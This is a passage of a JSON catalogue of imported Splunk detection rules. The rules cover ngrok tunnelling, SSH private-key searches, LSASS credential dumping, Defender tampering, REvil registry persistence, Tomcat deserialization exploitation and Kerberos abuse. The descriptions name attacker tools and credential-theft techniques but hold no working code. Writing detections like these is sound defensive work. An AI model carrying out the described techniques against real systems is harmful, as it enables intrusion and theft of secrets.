Windows operating system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because while ngrok is a legitimate tool for creating secure tunnels, it is increasingly used by adversaries to bypass network defenses and establish reverse proxies. 
If confirmed malicious, this could allow attackers to exfiltrate data, maintain persistence, or facilitate further attacks by tunneling traffic through the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ngrok-reverse-proxy-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e2549f2c-0aef-408a-b0c1-e0f270623436", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ngrok_reverse_proxy_usage.yml" } }, { "id": "splunk-security-content-e26bc52d-9cbc-4743-9745-e8781d935042", "type": "detection", "name": "M365 Copilot Non Compliant Devices Accessing M365 Copilot", "description": "Detects M365 Copilot access from non-compliant or unmanaged devices that violate corporate security policies, indicating potential shadow IT usage, BYOD policy violations, or compromised endpoint access. The detection filters M365 Copilot Graph API events where deviceDetail.isCompliant=false or deviceDetail.isManaged=false, then aggregates by user, operating system, and browser to calculate metrics including event counts, unique IPs and locations, and compliance/management status over time. 
Users accessing Copilot from non-compliant or unmanaged devices are flagged and sorted by activity volume and geographic spread, enabling security teams to identify unauthorized endpoints that may lack proper security controls, encryption, or MDM enrollment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-non-compliant-devices-accessing-m365-copilot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e26bc52d-9cbc-4743-9745-e8781d935042", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_non_compliant_devices_accessing_m365_copilot.yml" } }, { "id": "splunk-security-content-e27fbc5d-0445-4c4a-bc39-87f060d5c602", "type": "detection", "name": "Linux High Frequency Of File Deletion In Boot Folder", "description": "The following analytic detects a high frequency of file deletions in the /boot/ folder on Linux systems. It leverages filesystem event logs to identify when 200 or more files are deleted within an hour by the same process. This behavior is significant as it may indicate the presence of wiper malware, such as Industroyer2, which targets critical system directories. 
If confirmed malicious, this activity could lead to system instability or failure, hindering the boot process and potentially causing a complete system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-high-frequency-of-file-deletion-in-boot-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e27fbc5d-0445-4c4a-bc39-87f060d5c602", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_high_frequency_of_file_deletion_in_boot_folder.yml" } }, { "id": "splunk-security-content-e28b4fd4-8f5a-41cd-8222-2f1ccca53ef1", "type": "detection", "name": "Tomcat Session Deserialization Attempt", "description": "This detection identifies potential exploitation of CVE-2025-24813 in Apache Tomcat through the second stage of the attack. This phase occurs when an attacker attempts to trigger deserialization of a previously uploaded malicious session file by sending a GET request with a specially crafted JSESSIONID cookie. 
These requests typically have specific characteristics, including a JSESSIONID cookie with a leading dot that matches a previously uploaded filename, and typically result in an HTTP 500 error when the exploitation succeeds.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/tomcat-session-deserialization-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e28b4fd4-8f5a-41cd-8222-2f1ccca53ef1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/tomcat_session_deserialization_attempt.yml" } }, { "id": "splunk-security-content-e2b36208-a364-11eb-8909-acde48001122", "type": "detection", "name": "Plain HTTP POST Exfiltrated Data", "description": "The following analytic detects potential data exfiltration using plain HTTP POST requests. It leverages network traffic logs, specifically monitoring the `stream_http` data source for POST methods containing suspicious form data such as \"wermgr.exe\" or \"svchost.exe\". This activity is significant because it is commonly associated with malware like Trickbot, trojans, keyloggers, or APT adversaries, which use plain text HTTP POST requests to communicate with remote C2 servers. 
If confirmed malicious, this activity could lead to unauthorized data exfiltration, compromising sensitive information and potentially leading to further network infiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/plain-http-post-exfiltrated-data.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e2b36208-a364-11eb-8909-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/plain_http_post_exfiltrated_data.yml" } }, { "id": "splunk-security-content-e2b99e7d-d956-411a-a120-2b14adfdde93", "type": "detection", "name": "Okta Authentication Failed During MFA Challenge", "description": "The following analytic identifies failed authentication attempts during the Multi-Factor Authentication (MFA) challenge in an Okta tenant. It uses the Authentication datamodel to detect specific failed events where the authentication signature is `user.authentication.auth_via_mfa`. This activity is significant as it may indicate an adversary attempting to authenticate with compromised credentials on an account with MFA enabled. 
If confirmed malicious, this could suggest an ongoing attempt to bypass MFA protections, potentially leading to unauthorized access and further compromise of the affected account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-authentication-failed-during-mfa-challenge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e2b99e7d-d956-411a-a120-2b14adfdde93", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_authentication_failed_during_mfa_challenge.yml" } }, { "id": "splunk-security-content-e2d2bd10-dcd1-4b2f-8a76-0198eab32ba5", "type": "detection", "name": "Linux Auditd Find Ssh Private Keys", "description": "The following analytic detects suspicious attempts to find SSH private keys, which may indicate an attacker's effort to compromise secure access to systems. SSH private keys are essential for secure authentication, and unauthorized access to these keys can enable attackers to gain unauthorized access to servers and other critical infrastructure. 
By monitoring for unusual or unauthorized searches for SSH private keys, this analytic helps identify potential threats to network security, allowing security teams to quickly respond and safeguard against unauthorized access and potential breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-find-ssh-private-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e2d2bd10-dcd1-4b2f-8a76-0198eab32ba5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_find_ssh_private_keys.yml" } }, { "id": "splunk-security-content-e321804c-8eb5-42f2-a843-36b289a6c6b2", "type": "detection", "name": "ESXi Firewall Disabled", "description": "This detection identifies when the ESXi firewall is disabled or set to permissive mode, which can expose the host to unauthorized access and network-based attacks. 
Such changes are often a precursor to lateral movement, data exfiltration, or the installation of malicious software by a threat actor.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-firewall-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e321804c-8eb5-42f2-a843-36b289a6c6b2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_firewall_disabled.yml" } }, { "id": "splunk-security-content-e3236f49-daf3-4b70-b808-9290912ac64d", "type": "detection", "name": "AWS High Number Of Failed Authentications For User", "description": "The following analytic detects an AWS account experiencing more than 20 failed authentication attempts within a 5-minute window. It leverages AWS CloudTrail logs to identify multiple failed ConsoleLogin events. This behavior is significant as it may indicate a brute force attack targeting the account. If confirmed malicious, the attacker could potentially gain unauthorized access, leading to data breaches or further exploitation of the AWS environment. 
Security teams should consider adjusting the threshold based on their specific environment to reduce false positives.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-high-number-of-failed-authentications-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3236f49-daf3-4b70-b808-9290912ac64d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_high_number_of_failed_authentications_for_user.yml" } }, { "id": "splunk-security-content-e3308b0c-d1a1-40d5-9486-4500f0d34731", "type": "detection", "name": "M365 Copilot Application Usage Pattern Anomalies", "description": "Detects M365 Copilot users exhibiting suspicious application usage patterns including multi-location access, abnormally high activity volumes, or access to multiple Copilot applications that may indicate account compromise or automated abuse. The detection aggregates M365 Copilot Graph API events per user, calculating metrics like distinct cities/countries accessed, unique IP addresses, number of different Copilot apps used, and average events per day over the observation period. 
Users are flagged when they access Copilot from multiple cities (cities_count > 1), generate excessive daily activity (events_per_day > 100), or use more than two different Copilot applications (app_count > 2), which are anomalous patterns suggesting credential compromise or bot-driven abuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-application-usage-pattern-anomalies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3308b0c-d1a1-40d5-9486-4500f0d34731", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_application_usage_pattern_anomalies.yml" } }, { "id": "splunk-security-content-e369afe8-cd35-47a3-9c1e-d813efc1f7dd", "type": "detection", "name": "Windows AppLocker Block Events", "description": "The following analytic detects attempts to bypass application restrictions by identifying Windows AppLocker policy violations. It leverages Windows AppLocker event logs, specifically EventCodes 8007, 8004, 8022, 8025, 8029, and 8040, to pinpoint blocked actions. This activity is significant for a SOC as it highlights potential unauthorized application executions, which could indicate malicious intent or policy circumvention. 
If confirmed malicious, this activity could allow an attacker to execute unauthorized applications, potentially leading to further system compromise or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-applocker-block-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e369afe8-cd35-47a3-9c1e-d813efc1f7dd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_applocker_block_events.yml" } }, { "id": "splunk-security-content-e36de71a-6bdc-4002-98ff-e3e51b0d8f96", "type": "detection", "name": "O365 Email Password and Payroll Compromise Behavior", "description": "The following analytic identifies when an O365 email recipient receives and then deletes emails for the combination of both password and banking/payroll changes within a short period. 
This behavior may indicate a compromised account where the threat actor is attempting to redirect the victim's payroll to an attacker-controlled bank account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.008", "T1485", "T1114.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-password-and-payroll-compromise-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e36de71a-6bdc-4002-98ff-e3e51b0d8f96", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_password_and_payroll_compromise_behavior.yml" } }, { "id": "splunk-security-content-e39dc429-c2a5-4f1f-9c3c-6b211af6b332", "type": "detection", "name": "Windows Steal Authentication Certificates Export Certificate", "description": "The following analytic detects the use of the PowerShell cmdlet 'export-certificate' executed via the command line, indicating an attempt to export a certificate from the local Windows Certificate Store. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. Exporting certificates is significant as it may indicate credential theft or preparation for man-in-the-middle attacks. 
If confirmed malicious, this activity could allow an attacker to impersonate users, decrypt sensitive communications, or gain unauthorized access to systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-export-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e39dc429-c2a5-4f1f-9c3c-6b211af6b332", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_export_certificate.yml" } }, { "id": "splunk-security-content-e3adc0d3-9e4b-4b5d-b662-12cec1adff2a", "type": "detection", "name": "Azure AD Service Principal New Client Credentials", "description": "The following analytic detects the addition of new credentials to Service Principals and Applications in Azure AD. It leverages Azure AD AuditLogs, specifically monitoring the \"Update application*Certificates and secrets management\" operation. This activity is significant as it may indicate an adversary attempting to maintain persistent access or escalate privileges within the Azure environment. 
If confirmed malicious, attackers could use these new credentials to log in as the service principal, potentially compromising sensitive accounts and resources, leading to unauthorized access and control over the Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-new-client-credentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3adc0d3-9e4b-4b5d-b662-12cec1adff2a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_new_client_credentials.yml" } }, { "id": "splunk-security-content-e3b42daf-fff4-429d-bec8-2a199468cea9", "type": "detection", "name": "Windows Modify Registry Suppress Win Defender Notif", "description": "The following analytic detects modifications in the Windows registry to suppress Windows Defender notifications. It leverages data from the Endpoint.Registry datamodel, specifically targeting changes to the \"Notification_Suppress\" registry value. This activity is significant because adversaries, including those deploying Azorult malware, use this technique to bypass Windows Defender and disable critical notifications. 
If confirmed malicious, this behavior could allow attackers to evade detection, maintain persistence, and execute further malicious activities without alerting the user or security tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-suppress-win-defender-notif.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3b42daf-fff4-429d-bec8-2a199468cea9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_suppress_win_defender_notif.yml" } }, { "id": "splunk-security-content-e3d3f57a-c381-11eb-9e35-acde48001122", "type": "detection", "name": "Revil Registry Entry", "description": "The following analytic identifies suspicious modifications in the registry entry, specifically targeting paths used by malware like REVIL. It detects changes in registry paths such as `SOFTWARE\\\\WOW6432Node\\\\Facebook_Assistant` and `SOFTWARE\\\\WOW6432Node\\\\BlackLivesMatter`. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry modifications linked to process GUIDs. This activity is significant as it indicates potential malware persistence mechanisms, often used by advanced persistent threats (APTs) and ransomware. 
If confirmed malicious, this could allow attackers to maintain persistence, encrypt files, and store critical ransomware-related information on compromised hosts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/revil-registry-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3d3f57a-c381-11eb-9e35-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/revil_registry_entry.yml" } }, { "id": "splunk-security-content-e3e7a1c0-f2b9-445c-8493-f30a63522d1a", "type": "detection", "name": "Detect Regsvcs with Network Connection", "description": "The following analytic identifies instances of Regsvcs.exe establishing a network connection to a public IP address, excluding private IP ranges. This detection leverages Sysmon EventID 3 logs to monitor network connections initiated by Regsvcs.exe. This activity is significant as Regsvcs.exe, a legitimate Microsoft-signed binary, can be exploited to bypass application control mechanisms and establish remote Command and Control (C2) channels. If confirmed malicious, this behavior could allow an attacker to escalate privileges, persist in the environment, and exfiltrate sensitive data. 
Immediate investigation and remediation are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regsvcs-with-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3e7a1c0-f2b9-445c-8493-f30a63522d1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regsvcs_with_network_connection.yml" } }, { "id": "splunk-security-content-e3ef244e-0a67-11ec-abf2-acde48001122", "type": "detection", "name": "PetitPotam Suspicious Kerberos TGT Request", "description": "The following analytic detects a suspicious Kerberos Ticket Granting Ticket (TGT) request, identified by Event Code 4768. This detection leverages Windows Security Event Logs to identify TGT requests with unusual fields, which may indicate the use of tools like Rubeus following the exploitation of CVE-2021-36942 (PetitPotam). This activity is significant as it can signal an attacker leveraging a compromised certificate to request Kerberos tickets, potentially leading to unauthorized access. 
If confirmed malicious, this could allow attackers to escalate privileges and persist within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/petitpotam-suspicious-kerberos-tgt-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3ef244e-0a67-11ec-abf2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml" } }, { "id": "splunk-security-content-e40a40a1-9fea-4554-abdf-b164422f0627", "type": "detection", "name": "Windows Rdp AutomaticDestinations Deletion", "description": "This detection identifies the deletion of files within the AutomaticDestinations folder, located under a user\u2019s AppData\\Roaming\\Microsoft\\Windows\\Recent directory. These files are part of the Windows Jump List feature, which records recently accessed files and folders tied to specific applications. Each .automaticDestinations-ms file corresponds to a program (e.g., Explorer, Word, Notepad) and can be valuable for forensic analysis of user activity. Adversaries may target this folder to erase evidence of their actions, such as which documents or directories were accessed during a session. This type of deletion is rarely seen during normal user activity and may indicate deliberate anti-forensic behavior. 
When correlated with suspicious logon events, RDP usage, or script execution, this activity may represent an attempt to cover tracks after data access, lateral movement, or staging for exfiltration. Detecting removal of these artifacts can highlight post-compromise cleanup efforts and help analysts reconstruct attacker behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-automaticdestinations-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e40a40a1-9fea-4554-abdf-b164422f0627", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_automaticdestinations_deletion.yml" } }, { "id": "splunk-security-content-e40ef542-8241-4419-9af4-6324582ea60a", "type": "detection", "name": "Windows KrbRelayUp Service Creation", "description": "The following analytic detects the creation of a service with the default name \"KrbSCM\" associated with the KrbRelayUp tool. It leverages Windows System Event Logs, specifically EventCode 7045, to identify this activity. This behavior is significant as KrbRelayUp is a known tool used for privilege escalation attacks. 
If confirmed malicious, this activity could allow an attacker to escalate privileges, potentially gaining unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-krbrelayup-service-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e40ef542-8241-4419-9af4-6324582ea60a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_krbrelayup_service_creation.yml" } }, { "id": "splunk-security-content-e4384bbf-5835-4831-8d85-694de6ad2cc6", "type": "detection", "name": "AWS Exfiltration via Anomalous GetObject API Activity", "description": "The following analytic identifies anomalous GetObject API activity in AWS, indicating potential data exfiltration attempts. It leverages AWS CloudTrail logs and uses the `anomalydetection` command to detect unusual patterns in the frequency of GetObject API calls by analyzing fields such as \"count,\" \"user_type,\" and \"user_arn\" within a 10-minute window. This activity is significant as it may indicate unauthorized data access or exfiltration from S3 buckets. 
If confirmed malicious, attackers could exfiltrate sensitive data, leading to data breaches and compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-exfiltration-via-anomalous-getobject-api-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4384bbf-5835-4831-8d85-694de6ad2cc6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_exfiltration_via_anomalous_getobject_api_activity.yml" } }, { "id": "splunk-security-content-e451bd16-e4c5-4109-8eb1-c4c6ecf048b4", "type": "detection", "name": "Suspicious Rundll32 no Command Line Arguments", "description": "The following analytic detects the execution of rundll32.exe without any command line arguments.\nThis behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process execution logs.\nIt is significant because rundll32.exe typically requires command line arguments to function properly, and its absence is often associated with malicious activities, such as those performed by Cobalt Strike.\nIf confirmed malicious, this activity could indicate an attempt to execute arbitrary code, potentially leading to credential dumping, unauthorized file writes, or other malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, 
"source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-rundll32-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e451bd16-e4c5-4109-8eb1-c4c6ecf048b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_rundll32_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-e4602172-db86-4315-86df-da66fb40bcde", "type": "detection", "name": "Windows Unusual SysWOW64 Process Run System32 Executable", "description": "The following analytic detects an unusual process execution pattern where a process running from C:\\Windows\\SysWOW64\\ attempts to execute a binary from C:\\Windows\\System32\\. In a typical Windows environment, 32-bit processes under SysWOW64 should primarily interact with 32-bit binaries within the same directory. 
However, an execution flow where a 32-bit process spawns a 64-bit binary from System32 can indicate potential process injection, privilege escalation, evasion techniques, or unauthorized execution hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-syswow64-process-run-system32-executable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4602172-db86-4315-86df-da66fb40bcde", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_syswow64_process_run_system32_executable.yml" } }, { "id": "splunk-security-content-e4723b92-7266-11ec-af45-acde48001122", "type": "detection", "name": "Windows Possible Credential Dumping", "description": "The following analytic detects potential credential dumping by identifying specific GrantedAccess permission requests and CallTrace DLLs targeting the LSASS process. It leverages Sysmon EventCode 10 logs, focusing on access requests to lsass.exe and call traces involving debug and native API DLLs like dbgcore.dll, dbghelp.dll, and ntdll.dll. This activity is significant as credential dumping can lead to unauthorized access to sensitive credentials. 
